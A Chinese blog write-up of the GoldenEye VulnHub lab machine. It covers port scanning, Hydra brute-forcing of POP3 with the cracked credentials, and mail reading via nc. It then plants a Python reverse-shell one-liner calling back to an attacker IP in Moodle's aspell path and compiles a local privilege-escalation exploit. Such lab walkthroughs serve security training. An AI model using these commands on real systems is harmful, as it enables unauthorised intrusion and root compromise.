vulnhub渗透日记03:GoldenEye

已于 2023-07-21 19:52:52 修改
阅读量89 收藏 1
点赞数
分类专栏: Vulnhub靶机渗透日记 文章标签: 网络安全 web安全 linux
于 2023-07-15 22:03:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ericalezl/article/details/131744619
版权
文章介绍了对GoldenEye靶机的端口扫描,发现了SMTP、HTTP和POP3服务,通过nmap获取了服务版本和证书信息。使用Hydra进行POP3密码爆破,成功登陆并获取到内部信息。进一步利用这些信息进行反弹shell和提权操作,最终获得管理员权限。
摘要由CSDN通过智能技术生成

前言

⏰时间:2023.7.15
🗺️靶机地址:https://download.vulnhub.com/goldeneye/GoldenEye-v1.ova
⚠️文中涉及操作均在靶机模拟环境中完成,切勿未经授权用于真实环境。
🙏本人水平有限,如有错误望指正,感谢您的查阅!
🎉欢迎关注🔍点赞👍收藏⭐️留言📝

信息收集

masscan扫端口
在这里插入图片描述
nmap扫服务

┌──(root㉿kali)-[/home/eric/myfile]
└─# nmap -sS -A -T4 -v -p 25,80,55007,55006 192.168.58.148

PORT      STATE SERVICE  VERSION
25/tcp    open  smtp     Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=ubuntu
| Issuer: commonName=ubuntu
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-04-24T03:22:34
| Not valid after:  2028-04-21T03:22:34
| MD5:   cd4a:d178:f216:17fb:21a6:0a16:8f46:c8c6
|_SHA-1: fda3:fc7b:6601:4746:96aa:0f56:b126:1c29:36e8:442c
80/tcp    open  http     Apache httpd 2.4.7 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
55006/tcp open  ssl/pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-04-24T03:23:52
| Not valid after:  2028-04-23T03:23:52
| MD5:   d039:2e71:c76a:2cb3:e694:ec40:7228:ec63
|_SHA-1: 9d6a:92eb:5f9f:e9ba:6cbd:dc93:55fa:5754:219b:0b77
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: SASL(PLAIN) UIDL USER PIPELINING AUTH-RESP-CODE RESP-CODES TOP CAPA
55007/tcp open  pop3     Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-04-24T03:23:52
| Not valid after:  2028-04-23T03:23:52
| MD5:   d039:2e71:c76a:2cb3:e694:ec40:7228:ec63
|_SHA-1: 9d6a:92eb:5f9f:e9ba:6cbd:dc93:55fa:5754:219b:0b77
|_pop3-capabilities: PIPELINING STLS USER UIDL SASL(PLAIN) CAPA RESP-CODES TOP AUTH-RESP-CODE
MAC Address: 00:0C:29:FE:2B:90 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.021 days (since Sat Jul 15 21:30:12 2023)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE
HOP RTT     ADDRESS
1   0.28 ms severnaya-station.com (192.168.58.148)

NSE: Script Post-scanning.
Initiating NSE at 22:00
Completed NSE at 22:00, 0.00s elapsed
Initiating NSE at 22:00
Completed NSE at 22:00, 0.00s elapsed
Initiating NSE at 22:00
Completed NSE at 22:00, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.93 seconds
           Raw packets sent: 27 (1.982KB) | Rcvd: 19 (1.454KB)

访问80端口
在这里插入图片描述提示访问/sev-home/登录
查看源码
在这里插入图片描述工具网站 https://forum.ywhack.com/coding.php
html解码为:InvincibleHack3r
登录后提示pop3非默认端口
在这里插入图片描述查看源码
在这里插入图片描述

POP3爆破

已知用户名Boris和Natalya,而且提示修改默认密码,估计可以爆破出来
hydra -L 1.txt -P /usr/share/wordlists/fasttrack.txt 192.168.58.148 -s 55007 pop3
[55007][pop3] host: 192.168.58.148 login: boris password: secret1!
[55007][pop3] host: 192.168.58.148 login: natalya password: bird
nc 192.168.58.148 55007 进入

user boris  
pass secret1!
list   #显示邮件数量
retr 1、2、3  #选择读取哪封邮件

boris中的邮件没啥东西,natalya中发现如下信息
在这里插入图片描述在本地/etc/hosts文件中添加域名severnaya-station.com
访问severnaya-station.com/gnocertdir
username: xenia
password: RCP90rulez!
登录后在message找到doak的信息
在这里插入图片描述尝试爆破doak的pop3
在这里插入图片描述在这里插入图片描述username: dr_doak
password: 4England!
登录后拿到一个文件
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述
解码为 xWinter1995x! ,登录admin
在这里插入图片描述

反弹shell

先得把这个设置为PSpellShell,save
在这里插入图片描述在system path的path to aspell中写入payload
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.58.128",5555));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
在这里插入图片描述kali监听 nc -nvlp 5555
在这里谁便写点东西,点击红框按钮,负责检测拼写的,点击即可收到shell
在这里插入图片描述在这里插入图片描述
python 开启交互shell
在这里插入图片描述
查看版本
在这里插入图片描述搜到exp
在这里插入图片描述目标没有gcc,有cc
在这里插入图片描述将exp传到目标
cc 37292.c -o exp
./exp 即可提权

_WHOAM1
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
vulnhub靶机:GoldenEye-v1
prettyX的博客
04-06 1005
靶机介绍 靶机下载地址:https://www.vulnhub.com/entry/goldeneye-1,240/ 开始 1、ip探测,本次靶机的ip为:192.168.1.109 //kali arp-scan -l 2、nmap端口扫描 3、先尝试访问80端口 4、访问robots.txt,404 5、查看网页源码 6、继续查看这个.js文件 “Bori...
vulnhub靶场——GOLDENEYE: 1 渗透记录
ShenZ的博客
02-10 2268
vulnhub—GOLDENEYE: 1 vulnhub靶场——GOLDENEYE: 1 渗透记录 About Description 一、信息搜集 二、网站渗透 三、Moodle漏洞利用
1-vulnhub GoldenEye-v1实战
weixin_45345568的博客
04-15 1351
靶机下载地址为:https://www.vulnhub.com/entry/goldeneye-1,240/ 本次的靶机ip为192.168.3.11(桥接模式自动获取) 一、信息搜集: 1.扫描ip 发现靶机ip为192.168.3.11 2.使用nmap进行扫描端口 发现其中有一个是网站 其余三个是与邮件协议相关的端口 nmap -sS -Pn 1-65535 192.168.3.11 Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-03 22.
GoldenEye:GoldenEye HTTP DoS 测试工具-开源
05-30
GoldenEye 是一个仅用于安全测试目的的 Python 应用程序! GoldenEye 是一个 HTTP DoS 测试工具。 被利用的攻击向量:HTTP Keep Alive + NoCache 请参阅自述文件了解更多详情。 请注意,这是 ...
GoldenEye:GoldenEye第7层(KeepAlive + NoCache)DoS测试工具
05-26
GoldenEye是仅用于安全性测试目的的Python 3应用程序! GoldenEye是一个HTTP DoS测试工具。 被利用的攻击媒介:HTTP Keep Alive + NoCache 用法 USAGE: ./goldeneye.py <url> [OPTIONS] OPTIONS: Flag ...
GoldEditor:GoldenEye设置编辑器
05-25
GoldenEye设置编辑器 最初由SubDrag,Wreck和Zoinkity创建。 反馈可以 资料下载 第4版(推荐) 下载 4.3 / 4.2-Carn的最后一次建造 / 4.1 / 4.0-最新的x86版本 / 版本3(旧版) 下载 3.0-决赛 / 3.0-SubDrag的...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8443
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全售前入门06安全服务——基线检测服务方案
打工人
08-30 1585
安全基线检查可以帮助单位认清自身风险现状和漏洞隐患,使业务系统的风险维持在可控范围内。根本目的是保障业务系统的安全,是为了避免人为疏忽或错误,或使用默认的安全配置,给业务系统安全造成风险而制定的安全检查标准,并且采取必要的安全检查措施,使业务系统达到相对的安全指标要求。
网络安全】漏洞挖掘
anquan2233的博客
08-29 1353
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
人工智能在网络安全领域的应用探索
A526847的博客
08-29 1257
随着网络技术的飞速发展,网络安全问题日益凸显,成为制约数字化进程的重要瓶颈。人工智能(AI)作为一种变革性技术,正逐步在网络安全领域展现出其巨大的潜力和价值。本文旨在探讨人工智能在网络安全领域的应用现状、优势、挑战及未来发展趋势。
入门网络安全工程师要学习哪些内容
白帽子佳奇的博客
08-30 954
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
网络安全售前入门07安全服务——主机漏洞扫描服务方案
打工人
08-30 695
漏洞扫描服务主要针对系统层、网络层、数据层、应用层进行安全评估,即对客户使用系统的运行环境进行安全评估。
Oracle 网络安全产品安全认证检索
In-Memory Computing Technology
08-30 528
列入《网络关键设备和网络安全专用产品目录》的网络安全专用产品应当按照《信息安全技术网络安全专用产品安全技术要求》等相关国家标准的强制性要求,由具备资格的机构安全认证合格或者安全检测符合要求后,方可销售或者提供。Oracle Zero Data Loss Recovery Appliance (ZDLRA)属于此类,ZDLRA RA23于2024年7月通过网络安全专用产品安全检测,标志着这款产品完全符合中国政府对于安全产品的要求,包括技术及供应链安全要求。检测结果已在网信办官网上发布。
深度解析:防火墙技术在网络安全中的应用与发展
A526847的博客
08-28 505
网络安全领域,防火墙技术作为一道至关重要的防线,始终扮演着保护内部网络免受外部威胁侵害的关键角色。随着网络技术的不断演进和攻击手段的日益复杂,防火墙技术也在不断发展和完善,以应对不断升级的安全挑战。本文将对防火墙技术在网络安全中的应用与发展进行深度解析。
网络安全入门教程(非常详细)从零基础入门到精通_网路安全 教程
2401_85023708的博客
08-30 2217
1.入行网络安全这是一条坚持的道路,三分钟的热情可以放弃往下看了。2.多练多想,不要离开了教程什么都不会了,最好看完教程自己独立完成技术方面的开发。3.有时多百度,我们往往都遇不到好心的大神,谁会无聊天天给你做解答。4.遇到实在搞不懂的,可以先放放,以后再来解决。先科普划分一下级别(全部按小白基础,会写个表格word就行的这种)**1级:脚本小子;难度:无,**达到“黑客新闻”的部分水准(一分钱买iphone、黑掉母校官网挂女神照片什么的)网络安全工程师;
网络安全基础】网络安全的基本概念与威胁
最新发布
weixin_39372311的博客
09-02 679
网络安全是指保护计算机网络和系统免受未经授权的访问、攻击、损害或破坏的技术和实践。网络安全的目标是确保信息的机密性、完整性和可用性,简称CIA三要素。机密性:保证信息只能被授权的用户或系统访问和读取。完整性:确保信息在存储、传输或处理过程中不被未经授权的篡改或破坏。可用性:确保系统和数据在需要时可以被合法用户访问。
网络安全】XSS+OTP绕过+账户接管
等风来
09-01 288
因此,能够实现接管账户,但此漏洞需要用户交互,危害程度降低。
网络安全(黑客)自学
白帽子凯哥聊黑客
09-01 977
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值